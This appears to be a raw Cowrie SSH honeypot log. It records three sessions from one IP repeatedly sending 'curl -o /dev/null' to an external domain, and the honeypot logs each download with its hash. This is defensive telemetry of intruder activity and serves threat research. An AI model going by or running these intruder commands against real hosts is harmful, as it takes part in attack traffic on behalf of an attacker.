{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.655211Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.657982Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.658797Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.659410Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.662285Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.663823Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.666496Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.667246Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.699350Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.701581Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.704300Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.705763Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.706716Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.708445Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.709125Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.710977Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.711685Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.716759Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.746953Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.748398Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.749250Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.752803Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.754778Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.755666Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.758636Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.759117Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.789445Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.792071Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.792802Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.793237Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.794601Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.795216Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.798408Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.799192Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.802408Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.833364Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.835188Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.837714Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.840617Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.841801Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.844566Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.844961Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.849091Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.849463Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.881338Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.883426Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.886554Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.888803Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.889838Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.891941Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.892718Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.894369Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.895093Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.898174Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.929088Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.931234Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.932425Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.933306Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.937113Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.938134Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:47.940102Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.940547Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:47.998429Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.000576Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.001431Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.001878Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.003282Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.003912Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.005740Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.006227Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.009794Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.015325Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.050066Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.050944Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.076457Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.077230Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.081038Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.082037Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.111293Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.111998Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.116369Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.118723Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
